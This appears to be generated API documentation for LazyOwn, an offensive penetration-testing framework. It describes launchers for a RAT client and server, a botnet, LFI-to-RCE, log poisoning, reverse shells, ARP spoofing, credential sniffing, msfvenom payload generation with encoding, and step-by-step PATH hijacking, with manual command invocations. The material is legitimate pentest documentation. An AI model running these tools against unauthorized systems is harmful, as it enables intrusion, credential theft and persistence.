Process and display results from PacketStorm Security.

This function extracts exploit data from the provided content using regex. If any results are found, it prints the title and link for each exploit, and appends the results to a predata list. If no results are found, it prints an error message.

Parameters: - content (str): The HTML content from PacketStorm Security.

Returns: None Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


Process and display results from the National Vulnerability Database.

This function checks if there are any vulnerabilities in the provided content. If vulnerabilities are present, it prints the ID, description, and link for each CVE found, and appends the results to a predata list. If no results are found, it prints an error message.

Parameters: - content (dict): A dictionary containing vulnerability data.

Returns: None Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


Find CVEs in the National Vulnerability Database based on a keyword.

This function takes a keyword, formats it for the API request, and sends a GET request to the NVD API. If the request is successful, it returns the JSON response containing CVE data; otherwise, it returns False.

Parameters: - keyword (str): The keyword to search for in CVEs.

Returns: - dict or bool: The JSON response containing CVE data or False on failure. Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


Find exploits in ExploitAlert based on a keyword.

This function takes a keyword, formats it for the API request, and sends a GET request to the ExploitAlert API. If the request is successful, it returns the JSON response containing exploit data; otherwise, it returns False.

Parameters: - keyword (str): The keyword to search for exploits.

Returns: - dict or bool: The JSON response containing exploit data or False on failure. Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


Find exploits in PacketStorm Security based on a keyword.

This function takes a keyword, formats it for the search request, and sends a GET request to the PacketStorm Security website. If the request is successful, it returns the HTML response; otherwise, it returns False.

Parameters: - keyword (str): The keyword to search for exploits.

Returns: - str or bool: The HTML response containing exploit data or False on failure. Thanks to Sicat 🐈 An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/


Encrypts or decrypts data using XOR encryption with the provided key.

Parameters: data (bytes or bytearray): The input data to be encrypted or decrypted. key (str): The encryption key as a string.

Returns: bytearray: The result of the XOR operation, which can be either the encrypted or decrypted data.

Example: encrypted_data = xor_encrypt_decrypt(b”Hello, World!“,”key”) decrypted_data = xor_encrypt_decrypt(encrypted_data, “key”) print(decrypted_data.decode(“utf-8”)) # Outputs: Hello, World!

Additional Notes: - XOR encryption is symmetric, meaning that the same function is used for both encryption and decryption. - The key is repeated cyclically to match the length of the data if necessary. - This method is commonly used for simple encryption tasks, but it is not secure for protecting sensitive information.


Executes a shell command using the subprocess module, capturing its output.

Parameters: command (str): The command to execute.

Returns: str: The output of the command if successful, or an error message if an exception occurs.

Exceptions: - FileNotFoundError: Raised if the command is not found. - subprocess.CalledProcessError: Raised if the command exits with a non-zero status. - subprocess.TimeoutExpired: Raised if the command times out. - Exception: Catches any other unexpected exceptions.

Example: output = run(“ls -la”) print(output)

Additional Notes: The function attempts to execute the provided command, capturing its output. It also handles common exceptions that may occur during command execution.


Check if a file exists.

This function checks whether a given file exists on the filesystem. If the file does not exist, it prints an error message and returns False. Otherwise, it returns True.

Arguments: file (str): The path to the file that needs to be checked.

Returns: bool: Returns True if the file exists, False otherwise.

Example: >>> is_exist(‘/path/to/file.txt’) True >>> is_exist(‘/non/existent/file.txt’) False

Notes: This function uses os.path.isfile to determine the existence of the file. Ensure that the provided path is correct and accessible.


Extracts the domain from a given URL.

Parameters: url (str): The full URL from which to extract the domain.

Returns: str: The extracted domain from the URL, or None if it cannot be extracted.


Generates a certificate authority (CA), client certificate, and client key.

Returns: str: Paths to the generated CA certificate, client certificate, and client key.


internal wrapper of internal function to implement multiples rhost to operate.

COMMANDS.md Documentation by readmeneitor.py


Initializer for the LazyOwnShell class.

This method sets up the initial parameters and scripts for an instance of the LazyOwnShell class. It initializes a dictionary of parameters with default values and a list of script names that are part of the LazyOwnShell toolkit.

Attributes: params (dict): A dictionary of parameters with their default values. scripts (list): A list of script names included in the toolkit. output (str): An empty string to store output or results.


Handles undefined commands, including aliases.

This method checks if a given command (or its alias) exists within the class by attempting to find a corresponding method. If the command or alias is not found, it prints an error message.

:param line: The command or alias to be handled. :type line: str :return: None


Internal function to execute commands.

This method attempts to execute a given command using onecmd and captures the output. It sets the output attribute based on whether the command was executed successfully or an exception occurred.

:param command: The command to be executed. :type command: str :return: A message indicating the result of the command execution. :rtype: str


Handle the case where the user enters an empty line.

This method is called when the user submits an empty line of input in the command-line interface. By default, it provides feedback indicating that no command was entered.

It is useful for providing user-friendly messages or handling empty input cases in a custom manner.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called by the cmd library when an empty line is entered. You can override it in a subclass to change its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.emptyline() You didn’t enter any command.


Handle the end-of-file (EOF) condition.

This method is called when the user sends an end-of-file (EOF) signal by pressing Ctrl+D. It is typically used to handle cleanup or exit operations when the user terminates input.

In this implementation, it prints a farewell message and returns True to indicate that the shell should exit.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is a part of the cmd library’s command handling system. You can override it in a subclass to customize its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.do_EOF(None) LazyOwn say Goodbye! (shell exits)


Handle operations to perform after exiting the command loop.

This method is called after the command loop terminates, typically used for performing any final cleanup or displaying messages before the program exits.

In this implementation, it prints a message indicating that the custom shell is exiting.

License: This function is part of a program released under the GNU General Public License v3.0 (GPLv3). You can redistribute it and/or modify it under the terms of the GPLv3, as published by the Free Software Foundation.

Note: This method is called automatically by the cmd library’s command loop after the loop terminates. You can override it in a subclass to customize its behavior.

Example: >>> shell = LazyOwnShell() >>> shell.cmdloop() # Exits the command loop Exiting custom LazyOwnShell.


Set a parameter value.

This function takes a line of input, splits it into a parameter and a value, and sets the specified parameter to the given value if the parameter exists.

:param line: A string containing the parameter and value to be set. Expected format: ‘ ’. :type line: str :return: None :raises: ValueError if the input line does not contain exactly two elements.


Show the current parameter values.

This function iterates through the current parameters and their values, printing each parameter and its associated value.

:param line: This parameter is not used in the function. :type line: str :return: None


Lists all available scripts in the modules directory.

This method prints a list of available scripts in a formatted manner, arranging them into columns. It shows each script with sufficient spacing for readability.

:param line: This parameter is not used in the method. :type line: str :return: None


Runs a specific LazyOwn script.

This method executes a script from the LazyOwn toolkit based on the provided script name. If the script is not recognized, it prints an error message. To see available scripts, use the list or help list commands.

:param line: The command line input containing the script name. :type line: str :return: None


Runs the internal module modules/lazysearch.py.

This method executes the lazysearch script from the specified path, using the binary_name parameter from the self.params dictionary. If binary_name is not set, it prints an error message.

:return: None


Run the internal module located at modules/LazyOwnExplorer.py.

This method executes the LazyOwnExplorer.py script, which is used for graphical user interface (GUI) functionality within the LazyOwn framework.

The function performs the following steps:

  1. Calls self.run_script with LazyOwnExplorer.py to execute the GUI module.

:returns: None

Manual execution: 1. Ensure that the modules/LazyOwnExplorer.py script is present in the modules directory. 2. Run the script with: python3 modules/LazyOwnExplorer.py

Example: To run LazyOwnExplorer.py directly, execute: python3 modules/LazyOwnExplorer.py

Note: - Ensure that the script has the appropriate permissions and dependencies to run. - Verify that your environment supports GUI operations if using this script in a non-graphical environment.


Run the internal module located at modules/lazyown.py.

This method executes the lazyown.py script, which is a core component of the LazyOwn framework.

The function performs the following steps:

  1. Calls self.run_script with lazyown.py to execute the script.

:returns: None

Manual execution: 1. Ensure that the modules/lazyown.py script is present in the modules directory. 2. Run the script with: python3 modules/lazyown.py

Example: To run lazyown.py directly, execute: python3 modules/lazyown.py

Note: - Ensure that the script has the appropriate permissions and dependencies to run.


Run the internal module located at modules/update_db.sh.

This method executes the update_db.sh script to update the database of binary exploitables from gtofbins.

The function performs the following steps:

  1. Executes the update_db.sh script located in the modules directory using os.system.

:returns: None

Manual execution: 1. Ensure that the modules/update_db.sh script is present in the modules directory. 2. Run the script with: ./modules/update_db.sh

Example: To manually update the database, execute: ./modules/update_db.sh

Note: - Ensure that the script has execute permissions. - The script should be run with the necessary privileges if required.


Runs the internal module modules/lazynmap.sh for multiple Nmap scans.

This method executes the lazynmap script, using the current working directory and the rhost parameter from the self.params dictionary as the target IP. If rhost is not set, it prints an error message.

:return: None


Run the internal module located at modules/lazywerkzeug.py in debug mode.

This method executes the lazywerkzeug.py script with the specified parameters for remote and local hosts and ports. It is used to test Werkzeug in debug mode.

The function performs the following steps:

  1. Retrieves the rhost, lhost, rport, and lport values from self.params.
  2. Checks if all required parameters are set. If not, prints an error message and returns.
  3. Calls self.run_script with lazywerkzeug.py and the specified parameters.

:param rhost: The remote host address. :type rhost: str

:param lhost: The local host address. :type lhost: str

:param rport: The remote port number. :type rport: int

:param lport: The local port number. :type lport: int

:returns: None

Manual execution: 1. Ensure that rhost, lhost, rport, and lport are set in self.params. 2. The script modules/lazywerkzeug.py should be present in the modules directory. 3. Run the script with: python3 modules/lazywerkzeug.py <rhost> <rport> <lhost> <lport>

Example: To run lazywerkzeug.py with rhost set to "", rport to 5000, lhost to "localhost", and lport to 8000, set: self.params["rhost"] = "" self.params["rport"] = 5000 self.params["lhost"] = "localhost" self.params["lport"] = 8000 Then call: run_lazywerkzeugdebug()

Note: - Ensure that modules/lazywerkzeug.py has the appropriate permissions and dependencies to run. - Verify that the specified hosts and ports are correct and available.


Run the internal module located at modules/lazygat.sh. to gathering the sistem :)

This method executes the lazygat.sh script located in the modules directory with sudo privileges.

The function performs the following steps:

  1. Retrieves the current working directory.
  2. Executes the lazygat.sh script using sudo to ensure it runs with elevated permissions.

:returns: None

Manual execution: 1. Ensure that the modules/lazygat.sh script is present in the modules directory. 2. Run the script with: sudo ./modules/lazygat.sh

Example: To manually run the script with elevated privileges, execute: sudo ./modules/lazygat.sh

Note: - Ensure that the script has execute permissions. - The script should be run with sudo if it requires elevated privileges.


Runs the internal module modules/lazynmap.sh with discovery mode.

This method executes the lazynmap script in discovery mode. It uses the current working directory for locating the script.

:return: None


Run the sniffer internal module located at modules/lazysniff.py with the specified parameters.

This method executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the device value from self.params.
  2. Sets up the environment variables LANG and TERM to ensure proper script execution.
  3. Uses subprocess.run to execute the lazysniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing. :type device: str

:returns: None

Manual execution: 1. Ensure that device is set in self.params. 2. The script modules/lazysniff.py should be present in the modules directory. 3. Run the script with: python3 modules/lazysniff.py -i <device>

Example: To run lazysniff with device set to "eth0", set: self.params["device"] = "eth0" Then call: run_lazysniff()

Note: - Ensure that modules/lazysniff.py has the appropriate permissions and dependencies to run. - Ensure that the network interface specified is valid and properly configured.


Run the sniffer ftp internal module located at modules/lazyftpsniff.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the device value from self.params.
  2. Sets up the environment variables LANG and TERM to ensure proper script execution.
  3. Uses subprocess.run to execute the lazyftpsniff.py script with the -i option to specify the network interface.

:param device: The network interface to be used for sniffing. :type device: str

:returns: None

Manual execution: 1. Ensure that device is set in self.params. 2. The script modules/lazyftpsniff.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyftpsniff.py -i <device>

Example: To run lazyftpsniff with device set to "eth0", set: self.params["device"] = "eth0" Then call: run_lazyftpsniff()

Note: - Ensure that modules/lazyftpsniff.py has the appropriate permissions and dependencies to run. - Ensure that the network interface specified is valid and properly configured.


Run the internal module to search netbios vuln victims, located at modules/lazynetbios.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the startip, endip, and spoof_ip values from self.params.
  2. Uses subprocess.run to execute the lazynetbios.py script with the specified parameters.

:param startip: The starting IP address for the NetBIOS scan. :type startip: str

:param endip: The ending IP address for the NetBIOS scan. :type endip: str

:param spoof_ip: The IP address to be used for spoofing. :type spoof_ip: str

:returns: None

Manual execution: 1. Ensure that startip, endip, and spoof_ip are set in self.params. 2. The script modules/lazynetbios.py should be present in the modules directory. 3. Run the script with: python3 modules/lazynetbios.py <startip> <endip> <spoof_ip>

Example: To run lazynetbios with startip set to "", endip set to "", and spoof_ip set to "", set: self.params["startip"] = "" self.params["endip"] = "" self.params["spoof_ip"] = "" Then call: run_lazynetbios()

Note: - Ensure that modules/lazynetbios.py has the appropriate permissions and dependencies to run. - Ensure that the IP addresses are correctly set and valid for the NetBIOS scan.


Run the internal module located at modules/lazyhoneypot.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the email_from, email_to, email_username, and email_password values from self.params.
  2. Calls the run_script method to execute the lazyhoneypot.py script with the provided email parameters.

:param email_from: The email address from which messages will be sent. :type email_from: str

:param email_to: The recipient email address. :type email_to: str

:param email_username: The username for email authentication. :type email_username: str

:param email_password: The password for email authentication. :type email_password: str

:returns: None

Manual execution: 1. Ensure that email_from, email_to, email_username, and email_password are set in self.params. 2. The script modules/lazyhoneypot.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyhoneypot.py --email_from <email_from> --email_to <email_to> --email_username <email_username> --email_password <email_password>

Example: To run lazyhoneypot with email_from set to "sender@example.com", email_to set to "recipient@example.com", email_username set to "user", and email_password set to "pass", set: self.params["email_from"] = "sender@example.com" self.params["email_to"] = "recipient@example.com" self.params["email_username"] = "user" self.params["email_password"] = "pass" Then call: run_lazyhoneypot()

Note: - Ensure that modules/lazyhoneypot.py has the appropriate permissions and dependencies to run. - Ensure that the email credentials are correctly set for successful authentication and operation.


Run the internal module to create Oneliners with Groq AI located at modules/lazygptcli.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the prompt and api_key values from self.params.
  2. Checks if both prompt and api_key are set. If either is missing, it prints an error message and returns.
  3. Sets the environment variable GROQ_API_KEY with the provided api_key.
  4. Calls the run_script method to execute the lazygptcli.py script with the --prompt argument.

:param prompt: The prompt to be used by the script. :type prompt: str

:param api_key: The API key for accessing the service. :type api_key: str

:returns: None

Manual execution: 1. Ensure that prompt and api_key are set in self.params. 2. The script modules/lazygptcli.py should be present in the modules directory. 3. Set the environment variable GROQ_API_KEY with the API key value. 4. Run the script with: python3 modules/lazygptcli.py --prompt <prompt>

Example: To run lazygptcli with prompt set to "Your prompt" and api_key set to "your_api_key", set: self.params["prompt"] = "Your prompt" self.params["api_key"] = "your_api_key" Then call: run_lazygptcli()

Note: - Ensure that modules/lazygptcli.py has the appropriate permissions and dependencies to run. - The environment variable GROQ_API_KEY must be correctly set for the script to function.


Run the internal module GROQ AI located at modules/lazysearch_bot.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the prompt and api_key values from self.params.
  2. Checks if both prompt and api_key are set. If either is missing, it prints an error message and returns.
  3. Sets the environment variable GROQ_API_KEY with the provided api_key.
  4. Calls the run_script method to execute the lazysearch_bot.py script with the --prompt argument.

:param prompt: The prompt to be used by the script. :type prompt: str

:param api_key: The API key for accessing the service. :type api_key: str

:returns: None

Manual execution: 1. Ensure that prompt and api_key are set in self.params. 2. The script modules/lazysearch_bot.py should be present in the modules directory. 3. Set the environment variable GROQ_API_KEY with the API key value. 4. Run the script with: python3 modules/lazysearch_bot.py --prompt <prompt>

Example: To run lazysearch_bot with prompt set to "Search query" and api_key set to "your_api_key", set: self.params["prompt"] = "Search query" self.params["api_key"] = "your_api_key" Then call: run_lazysearch_bot()

Note: - Ensure that modules/lazysearch_bot.py has the appropriate permissions and dependencies to run. - The environment variable GROQ_API_KEY must be correctly set for the script to function.


Run the Metadata extractor internal module located at modules/lazyown_metaextract0r.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the value for path from self.params.
  2. Checks if the path parameter is set. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyown_metaextract0r.py script with the appropriate argument.

:param path: The file path to be processed by the script. :type path: str

:returns: None

Manual execution: 1. Ensure that path is set in self.params. 2. The script modules/lazyown_metaextract0r.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyown_metaextract0r.py --path <path>

Example: To run lazyown_metaextract0r with path set to /home/user/file.txt, set: self.params["path"] = "/home/user/file.txt" Then call: run_lazymetaextract0r()

Note: - Ensure that modules/lazyown_metaextract0r.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazyownclient.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for lhost, lport, and rat_key from self.params.
  2. Checks if all required parameters (lhost, lport, and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyownclient.py script with the appropriate arguments.

:param lhost: The IP address of the local host. :type lhost: str :param lport: The port number of the local host. :type lport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that lhost, lport, and rat_key are set in self.params. 2. The script modules/lazyownclient.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyownclient.py --host <lhost> --port <lport> --key <rat_key>

Example: To run lazyownclient with lhost set to, lport set to 8080, and rat_key set to my_secret_key, set: self.params["lhost"] = "" self.params["lport"] = 8080 self.params["rat_key"] = "my_secret_key" Then call: run_lazyownratcli()

Note: - Ensure that modules/lazyownclient.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazyownserver.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost, rport, and rat_key from self.params.
  2. Checks if all required parameters (rhost, rport, and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazyownserver.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. :type rhost: str :param rport: The port number of the remote host. :type rport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rhost, rport, and rat_key are set in self.params. 2. The script modules/lazyownserver.py should be present in the modules directory. 3. Run the script with: python3 modules/lazyownserver.py --host <rhost> --port <rport> --key <rat_key>

Example: To run lazyownserver with rhost set to, rport set to 8080, and rat_key set to my_secret_key, set: self.params["rhost"] = "" self.params["rport"] = 8080 self.params["rat_key"] = "my_secret_key" Then call: run_lazyownrat()

Note: - Ensure that modules/lazyownserver.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazybotnet.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rport and rat_key from self.params. The rhost is hardcoded to “”.
  2. Checks if all required parameters (rport and rat_key) are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazybotnet.py script with the appropriate arguments.

:param rport: The port number of the remote host. :type rport: int :param rat_key: The RAT key. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rport and rat_key are set in self.params. 2. The script modules/lazybotnet.py should be present in the modules directory. 3. Run the script with: python3 modules/lazybotnet.py --host <rhost> --port <rport> --key <rat_key>

Example: To run lazybotnet with rport set to 1234 and rat_key set to my_key, set: self.params["rport"] = 1234 self.params["rat_key"] = "my_key" Then call: run_lazybotnet()

Note: - Ensure that modules/lazybotnet.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazylfi2rce.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost, rport, lhost, lport, field, and wordlist from self.params.
  2. Checks if all required parameters are set. If any are missing, it prints an error message and returns.
  3. Calls the run_script method to execute the lazylfi2rce.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. :type rhost: str :param rport: The port number of the remote host. :type rport: int :param lhost: The IP address of the local host. :type lhost: str :param lport: The port number of the local host. :type lport: int :param field: The field name for the LFI attack. :type field: str :param wordlist: The path to the wordlist file. :type wordlist: str

:returns: None

Manual execution: 1. Ensure that rhost, rport, lhost, lport, field, and wordlist are set in self.params. 2. The script modules/lazylfi2rce.py should be present in the modules directory. 3. Run the script with: python3 modules/lazylfi2rce.py --rhost <rhost> --rport <rport> --lhost <lhost> --lport <lport> --field <field> --wordlist <wordlist>

Example: To run the lazylfi2rce with rhost set to, rport set to 80, lhost set to, lport set to 8080, field set to file, and wordlist set to path/to/wordlist.txt, set: self.params["rhost"] = "" self.params["rport"] = 80 self.params["lhost"] = "" self.params["lport"] = 8080 self.params["field"] = "file" self.params["wordlist"] = "path/to/wordlist.txt" Then call: run_lazylfi2rce()

Note: - Ensure that modules/lazylfi2rce.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazylogpoisoning.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rhost and lhost from self.params.
  2. Checks if the required parameters rhost and lhost are set. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazylogpoisoning.py script with the appropriate arguments.

:param rhost: The IP address of the remote host. Must be set in self.params. :type rhost: str :param lhost: The IP address of the local host. Must be set in self.params. :type lhost: str

:returns: None

Manual execution: 1. Ensure that rhost and lhost are set in self.params. 2. The script modules/lazylogpoisoning.py should be present in the modules directory. 3. Run the script with: python3 modules/lazylogpoisoning.py --rhost <rhost> --lhost <lhost>

Example: To run the lazylogpoisoning with rhost set to and lhost set to, set: self.params["rhost"] = "" self.params["lhost"] = "" Then call: run_lazylogpoisoning()

Note: - Ensure that modules/lazylogpoisoning.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazybotcli.py with the specified parameters.

This function executes the script with the following arguments:

The function performs the following steps:

  1. Retrieves the values for rport and rat_key from self.params.
  2. Checks if the required parameters rport and rat_key are set. If not, it prints an error message and returns.
  3. Calls the run_script method to execute the lazybotcli.py script with the appropriate arguments.

:param rport: The port number for the connection. Must be set in self.params. :type rport: int :param rat_key: The key for the RAT. Must be set in self.params. :type rat_key: str

:returns: None

Manual execution: 1. Ensure that rport and rat_key are set in self.params. 2. The script modules/lazybotcli.py should be present in the modules directory. 3. Run the script with: python3 modules/lazybotcli.py --host --port <rport> --key <rat_key>

Example: To run the lazybotcli with port 12345 and key mysecretkey, set: self.params["rport"] = 12345 self.params["rat_key"] = "mysecretkey" Then call: run_lazybotcli()

Note: - Ensure that modules/lazybotcli.py has the appropriate permissions and dependencies to run.


Run the internal module located at modules/lazybrutesshuserenum.py with the specified parameters. ONLY valid for 7.x Version !!!

The script will be executed with the following arguments:

The function performs the following steps:

  1. Retrieves the values for wordlist and rhost from self.params.
  2. Prints a warning message about the potential inaccuracy of the results.
  3. Constructs the command to run the lazybrutesshuserenum.sh script with the specified arguments.
  4. Executes the command using the os.system method.

:param wordlist: The path to the wordlist file for username enumeration. Must be set in self.params. :type wordlist: str :param rhost: The target IP address or hostname for SSH enumeration. Must be set in self.params. :type rhost: str

:returns: None

Manual execution: 1. Ensure that wordlist and rhost are set in self.params. 2. Run the script modules/lazybrutesshuserenum.sh with the appropriate arguments.

Dependencies: - modules/lazybrutesshuserenum.sh must be present in the modules directory and must be executable.

Example: To run the SSH user enumeration with a wordlist located at /path/to/wordlist.txt and target IP, set: self.params["usrwordlist"] = "/path/to/wordlist.txt" self.params["rhost"] = "" Then call: run_lazyssh77enum()

Note: - The accuracy of the results may vary depending on the version of the script and the wordlist used.


Run the internal module located at modules/lazyown_burpfuzzer.py with the specified parameters.

The script will be executed with the following arguments:

The function performs the following steps:

  1. Retrieves the values for url, method, headers, params, data, json_data, proxy_port, wordlist, and hide_code from self.params.
  2. Constructs the command to run the lazyown_burpfuzzer.py script with the specified arguments.
  3. Adds optional parameters based on whether the corresponding files (headers_file, data_file, params_file, json_data_file) are provided.
  4. Executes the command using the run_command method.

:param url: The target URL for the fuzzer. Must be set in self.params. :type url: str :param method: The HTTP method to use. Must be set in self.params. :type method: str :param headers: Optional HTTP headers. Must be set in self.params or provided via headers_file. :type headers: str :param params: Optional URL parameters. Must be set in self.params or provided via params_file. :type params: str :param data: Optional data for the request body. Must be set in self.params or provided via data_file. :type data: str :param json_data: Optional JSON data for the request body. Must be set in self.params or provided via json_data_file. :type json_data: str :param proxy_port: The port for the proxy server. Must be set in self.params. :type proxy_port: int :param wordlist: Optional wordlist for fuzzing. Must be set in self.params. :type wordlist: str :param hide_code: Optional code to hide. Must be set in self.params. :type hide_code: int :param headers_file: Optional file containing headers. :type headers_file: str, optional :param data_file: Optional file containing data. :type data_file: str, optional :param params_file: Optional file containing parameters. :type params_file: str, optional :param json_data_file: Optional file containing JSON data. :type json_data_file: str, optional

:returns: None

Manual execution: 1. Ensure that url, method, and proxy_port are set in self.params. 2. Provide additional parameters as needed. 3. Run the script modules/lazyown_burpfuzzer.py with the appropriate arguments.

Dependencies: - modules/lazyown_burpfuzzer.py must be present in the modules directory and must be executable.

Example: To run the fuzzer with URL http://example.com, HTTP method POST, and proxy port 8080, set: self.params["url"] = "http://example.com" self.params["method"] = "POST" self.params["proxy_port"] = 8080 Then call: run_lazyburpfuzzer()

Note: - Ensure that all required parameters are set before calling this function. - Parameters can also be provided via corresponding files.


Run the internal module located at modules/lazyreverse_shell.sh with the specified parameters.

The script will be executed with the following arguments: - --ip: The IP address to use for the reverse shell. - --puerto: The port to use for the reverse shell.

The function performs the following steps:

  1. Retrieves the values for rhost (IP address) and reverse_shell_port (port) from self.params.
  2. Validates that rhost and reverse_shell_port parameters are set.
  3. Constructs the command to run the lazyreverse_shell.sh script with the specified arguments.
  4. Executes the command.

:param ip: The IP address to use for the reverse shell. Must be set in self.params. :type ip: str :param port: The port to use for the reverse shell. Must be set in self.params. :type port: str

:returns: None

Manual execution: 1. Ensure that rhost and reverse_shell_port are set in self.params. 2. Run the script modules/lazyreverse_shell.sh with the appropriate arguments.

Dependencies: - modules/lazyreverse_shell.sh must be present in the modules directory and must be executable.

Example: To set up a reverse shell with IP and port 4444, set: self.params["rhost"] = "" self.params["reverse_shell_port"] = "4444" Then call: run_lazyreverse_shell()

Note: - Ensure that modules/lazyreverse_shell.sh has the necessary permissions to execute. - Parameters must be set before calling this function.


Run the internal module located at modules/lazyarpspoofing.py with the specified parameters.

The script will be executed with the following arguments: - --device: The network interface to use for ARP spoofing. - lhost: The local host IP address to spoof. - rhost: The remote host IP address to spoof.

The function performs the following steps:

  1. Retrieves the values for lhost, rhost, and device from self.params.
  2. Validates that lhost, rhost, and device parameters are set.
  3. Constructs the command to run the lazyarpspoofing.py script with the specified arguments.
  4. Executes the command.

:param lhost: The local host IP address to spoof. Must be set in self.params. :type lhost: str :param rhost: The remote host IP address to spoof. Must be set in self.params. :type rhost: str :param device: The network interface to use for ARP spoofing. Must be set in self.params. :type device: str

:returns: None

Manual execution: 1. Ensure that lhost, rhost, and device are set in self.params. 2. Run the script modules/lazyarpspoofing.py with the appropriate arguments.

Dependencies: - modules/lazyarpspoofing.py must be present in the modules directory and must be executable.

Example: To execute ARP spoofing with local host, remote host, and device eth0, set: self.params["lhost"] = "" self.params["rhost"] = "" self.params["device"] = "eth0" Then call: run_lazyarpspoofing()

Note: - Ensure that modules/lazyarpspoofing.py has the necessary permissions to execute. - Parameters must be set before calling this function.


Run the internal module located at modules/lazyatack.sh with the specified parameters.

The script will be executed with the following arguments: - --modo: The mode of the attack. - --ip: The target IP address. - --atacante: The attacker IP address.

The function performs the following steps:

  1. Retrieves the current working directory.
  2. Validates that mode, rhost, and lhost parameters are set.
  3. Constructs the command to run the lazyatack.sh script with the specified arguments.
  4. Executes the command.

:param mode: The mode in which the attack should be run. Must be set in self.params. :type mode: str :param target_ip: The IP address of the target. Must be set in self.params. :type target_ip: str :param attacker_ip: The IP address of the attacker. Must be set in self.params. :type attacker_ip: str

:returns: None

Manual execution: 1. Ensure that mode, rhost, and lhost are set in self.params. 2. Run the script modules/lazyatack.sh with the appropriate arguments.

Dependencies: - modules/lazyatack.sh must be present in the modules directory and must be executable.

Example: To execute the attack with mode scan, target IP, and attacker IP, set: self.params["mode"] = "scan" self.params["rhost"] = "" self.params["lhost"] = "" Then call: run_lazyattack()

Note: - Ensure that modules/lazyatack.sh has the necessary permissions to execute. - Parameters must be set before calling this function.


Executes the msfvenom tool to generate a variety of payloads based on user input.

This function prompts the user to select a payload type from a predefined list and runs the corresponding msfvenom command to create the desired payload. It handles tasks such as generating different types of payloads for Linux, Windows, macOS, and Android systems, including optional encoding with Shikata Ga Nai for C payloads.

The generated payloads are moved to a sessions directory, where appropriate permissions are set. Additionally, the payloads can be compressed using UPX for space efficiency. If the selected payload is an Android APK, the function will also sign the APK and perform necessary post-processing steps.

:param line: Command line arguments for the script. :return: None


Creates a path hijacking attack by performing the following steps:

  1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
  2. Copies this temporary script to /tmp with the name specified by binary_name.
  3. Sets executable permissions on the copied script.
  4. Prepends /tmp to the system’s PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack. It should be set in self.params before calling this method. :type binary_name: str

:returns: None

Manual execution: 1. Ensure that binary_name is set in self.params. 2. Append the binary name to modules/tmp.sh. 3. Copy modules/tmp.sh to /tmp/{binary_name}. 4. Set executable permissions on the copied file. 5. Update the PATH environment variable to prioritize /tmp.

Dependencies: - The self.params dictionary must contain a valid binary_name. - Ensure that modules/tmp.sh exists and contains appropriate content for the attack.

Example: To execute the path hijacking attack with binary_name as malicious, ensure self.params["binary_name"] is set to "malicious", and then call: run_lazypathhijacking()

Note: - The binary_name parameter must be a string representing the name of the binary to hijack. - The method modifies the PATH environment variable, which may affect the execution of other binaries.


Creates a path hijacking attack by performing the following steps:

  1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
  2. Copies this temporary script to /tmp with the name specified by binary_name.
